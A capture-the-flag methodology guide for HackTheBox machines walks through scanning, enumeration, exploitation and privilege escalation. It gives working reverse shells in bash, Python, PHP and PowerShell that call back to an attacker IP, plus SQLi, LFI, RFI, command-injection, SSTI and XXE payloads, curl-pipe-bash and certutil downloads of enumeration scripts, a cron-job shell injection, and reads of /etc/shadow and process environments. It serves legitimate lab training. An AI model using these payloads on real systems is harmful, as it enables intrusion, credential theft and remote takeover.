HackTheBox RoadMap: Recon to Root in 7 Phases

A structured methodology to follow when solving any HackTheBox machine.
This road map can be divided into 7 core stages:
- Phase 1: Reconnaissance (Port Scanning)
- Phase 2: Service Enumeration
- Phase 3: Vulnerability Identification
- Phase 4: Exploitation / Initial Access
- Phase 5: Post-Exploitation / Local Enumeration (Linux / Windows)
- Phase 6: Privilege Escalation (Linux / Windows)
- Phase 7: Capture the Flags
Plus a Quick Reference: Common Tools table and a set of Golden Rules at the end.
Phase 1: Reconnaissance (Port Scanning)
The goal is to discover what services are running on the target. You can use automated tools like NmapAutomator, the ordinary Nmap tool, or Rustscan to perform the scanning.
Firstly: Initial Fast Scan (Nmap)
nmap -sC -sV -vv -oN initial.txt <target_ip>-sCruns default scripts.-sVdetects service versions.-oNsaves output to a file.-vv(very verbose) increases the output detail level so Nmap shows results in real-time as it discovers them, instead of waiting until the full scan completes.-sAis an ACK scan. It sends TCP packets with only the ACK flag set to the target ports. It doesn't tell you if a port is open or closed — instead, it tells you whether a firewall is filtering the port or not.
Secondly: Full Port Scan
Scans all 65535 ports. Run this in the background while you work on the results from the initial scan.
nmap -p- -T4 -oN allports.txt <target_ip>Thirdly: UDP Scan (often overlooked)
nmap -sU --top-ports 50 -oN udp.txt <target_ip>What to Note
- Open ports and service versions
- Operating system hints
- Any script output (e.g., anonymous FTP, SMB shares, HTTP titles)
Phase 2: Service Enumeration
Spend the most time here. Enumerate every open service.
Firstly: HTTP/HTTPS (Port 80/443)
Add the host name to /etc/hosts:
echo "<target_ip> <hostname>.htb" | sudo tee -a /etc/hostsSecondly: Manual checks
- View the website in the browser
- Read the page source (Ctrl+U) for comments and hidden fields
- Check
/robots.txtand/sitemap.xml - Identify the tech stack from headers, extensions, and cookies
- Look for login forms, search bars, and file upload features
Thirdly: Directory brute-forcing using gobuster
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txtFourthly: Directory brute-forcing using ffuf
ffuf -u http://target/FUZZ -w /usr/share/wordlists/dirb/common.txtFifthly: Subdomain enumeration
gobuster vhost -u http://target.htb -w /usr/share/wordlists/subdomains-top1million-5000.txt
ffuf -u http://target.htb -H "Host: FUZZ.target.htb" -w /usr/share/wordlists/subdomains-top1million-5000.txtSixth: Vulnerability scanner
nikto -h http://targetSeventhly: Enumerating Common Services
1 — FTP (Port 21)
ftp <target_ip>
# Try anonymous login: anonymous / anonymous
# If logged in:
ls -la
get <filename>2 — SSH (Port 22)
- Don't brute-force unless you have a username
- Come back when you find credentials
- Check for outdated versions with known CVEs
3 — SMB (Port 139/445)
smbclient -L //<target_ip> -N
smbmap -H <target_ip>
enum4linux -a <target_ip>
crackmapexec smb <target_ip> --shares4 — DNS (Port 53)
dig axfr <hostname>.htb @<target_ip>
dig any <hostname>.htb @<target_ip>5 — SNMP (UDP Port 161)
snmpwalk -v2c -c public <target_ip>6 — MySQL (Port 3306)
mysql -h <target_ip> -u root -p7 — Redis (Port 6379)
redis-cli -h <target_ip>
info
keys *8 — WinRM (Port 5985)
evil-winrm -i <target_ip> -u <username> -p <password>Phase 3: Vulnerability Identification
Based on what you found, look for attack vectors. Check for known exploits using searchsploit.
searchsploit <service_name> <version>
searchsploit <CMS_name>Common Web Vulnerabilities to Test
1 — SQL Injection
' OR 1=1 --
' OR '1'='1
admin' --2 — Local File Inclusion (LFI)
http://target/page?file=../../../../etc/passwd
http://target/page?file=php://filter/convert.base64-encode/resource=index.php3 — Remote File Inclusion (RFI)
http://target/page?file=http://your_ip/shell.php4 — Command Injection
; whoami
| id
$(whoami)
`id`5 — Server-Side Template Injection (SSTI)
{{7*7}}
${7*7}6 — XML External Entity (XXE)
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>7 — Type Juggling (PHP)
parameter[]= # sends an array instead of a string8- Check for Misconfigurations
- Exposed config files (
.env,config.php,web.config) - Swap files (
.swp,.bak) - Directory listing enabled
- Default credentials
- Backup files (
file.php.bak,file.php.old) - Account takeover — See if there is a sign-in page. Try the possible usernames you may have found (e.g.,
ben@silentium.htb) through the reset-password page. If the account exists, a message will state that the reset link was sent to the email. When you press the reset link, intercept the traffic with Burp Suite and inspect the request and response. You may see that the temporary token is captured within the response. The key vulnerability here is that the API returns the reset token directly in the response instead of only sending it to the user's email — so you don't need access to the target's inbox to take over the account. - Node.js misconfigurations — This can exist in many AI-based platforms like Flowise (an open-source, no-code/low-code platform for building AI agents and chatbots visually). If the platform has a CustomMCP node that lets users define server configurations in JSON, and that config tells the server what command to execute, an attacker can inject a reverse-shell command instead of a legitimate server config — that's the basis of CVE-2025-59528.
Phase 4: Exploitation / Initial Access
Reverse Shell Cheat Sheet
1- Start the listener:
nc -lvnp 44442- Bash:
bash -i >& /dev/tcp/<your_ip>/4444 0>&13- Python:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'4- PHP:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'"); ?>5- PowerShell (Windows):
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<your_ip>",4444);...6- Shell Stabilisation (Linux)
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
stty rows 40 columns 160Troubleshooting note: If shell stabilisation withpython3 -c 'import pty; pty.spawn("/bin/bash")'fails because bash doesn't exist in the container, use/bin/shinstead.
Phase 5: Post-Exploitation / Local Enumeration
First: Linux Systems
1- Grab the User Flag
find / -name "user.txt" 2>/dev/null2- System Information
whoami
id
hostname
uname -a
cat /etc/os-release3- Users and Credentials
cat /etc/passwd | grep -v nologin | grep -v false
cat /etc/shadow 2>/dev/null
cat /etc/group
ls -la /home/4- Sudo Permissions
sudo -l5- SUID Binaries
find / -perm -4000 -type f 2>/dev/null6- Cron Jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l7- Writable Files and Directories
find / -writable -type f 2>/dev/null | grep -v proc
find / -writable -type d 2>/dev/null8- Config Files and Credentials
grep -rn "password\|passwd\|pass\|credentials\|db_" /var/www/ 2>/dev/null
cat /var/www/html/config.php 2>/dev/null
cat /var/www/html/.env 2>/dev/null
find / -name "*.conf" -o -name "*.config" -o -name "*.ini" 2>/dev/null9- Network Information
ifconfig
netstat -tulnp
ss -tulnp10- Running Processes
ps aux11- Command History
history
cat ~/.bash_history12- Capabilities
getcap -r / 2>/dev/null13- Automated Enumeration
# On attacker — host the script
python3 -m http.server 8000
# On target — download and run
curl http://<your_ip>:8000/linpeas.sh | bash
# or
wget http://<your_ip>:8000/linpeas.sh -O /tmp/linpeas.sh && bash /tmp/linpeas.shSecondly: Docker Machines
You might not get access to the host machine — you might land in a container instead.
Evidence you're inside a Docker container:
- The hostname is a random container ID (readable hostnames usually mean a real machine; random hex strings mean Docker container IDs).
- You can't find
user.txtorroot.txt, there are no sudo commands, and no flags in expected locations. - A
.dockerenvfile is present:
ls -la /.dockerenv- It's referenced in the cgroup listing:
cat /proc/1/cgroupThe flags are on the host machine, not inside this container. You need to escape this step and get a real SSH session to the host. To get saved credentials from the container's environment:
cat /proc/1/environ | tr '\0' '\n'Thirdly: Windows Systems
1- System Information
whoami /all
systeminfo
net user
net localgroup administrators2- Search for Credentials
findstr /si password *.txt *.ini *.config *.xml
reg query HKLM /f password /t REG_SZ /s3- Check Privileges
whoami /priv4- Automated Enumeration
:: WinPEAS
certutil -urlcache -f http://<your_ip>:8000/winpeas.exe winpeas.exe
.\winpeas.exePhase 6: Privilege Escalation
Firstly: Linux Systems
sudo -l Abuse — If you can run a command as root, check GTFOBins: https://gtfobins.github.io/
SUID Abuse — If a binary has SUID set, check GTFOBins for exploitation.
Cron Job Abuse — If a cron job runs a writable script as root, inject your payload:
echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' >> /path/to/writable/script.sh1- Kernel Exploits (Last Resort)
uname -r
# Search for kernel version exploits
searchsploit linux kernel <version>2- Password Reuse — Always try found passwords for other users and services:
su <username>
ssh <username>@target3- Group-Based Escalation
lxd/dockergroup → container escape to rootdiskgroup → read any file on diskadmgroup → read log files for credentials
4- Local host running services / Port Forwarding (SSH tunnelling from the target to the attacker):
netstat -tulpn | grep 127.0.0.1
ssh -L 3001:127.0.0.1:3001 <username>@<TARGET_IP>Secondly: Windows Systems
1- Token Privileges
SeImpersonatePrivilege→ Potato attacks (JuicyPotato, PrintSpoofer)SeBackupPrivilege→ copy SAM/SYSTEM hives
2- Service Misconfigurations
sc query state= all
accesschk.exe /accepteula -uwcqv "Authenticated Users" *3- Unquoted Service Paths
wmic service get name,pathname,displayname,startmode4- AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\InstallerPhase 7: Capture the Root Flag
# Linux
cat /root/root.txt:: Windows
type C:\Users\Administrator\Desktop\root.txtQuick Reference: Common Tools
| Purpose | Tools |
|---|---|
| Port Scanning | nmap, masscan, rustscan |
| Directory Brute-forcing | gobuster, ffuf, feroxbuster, dirb |
| Web Scanning | nikto, whatweb, wappalyzer |
| Exploit Search | searchsploit, Google, CVE databases |
| Password Cracking | john, hashcat, hydra |
| File Transfer | python http.server, wget, curl, certutil |
| Linux Enumeration | LinPEAS, LinEnum, linux-exploit-suggester |
| Windows Enumeration | WinPEAS, PowerUp, Seatbelt, SharpHound |
| Privilege Escalation Reference | GTFOBins (Linux), LOLBAS (Windows) |
By CyberAlp0 - CyberSkii - Knowledge That Protects


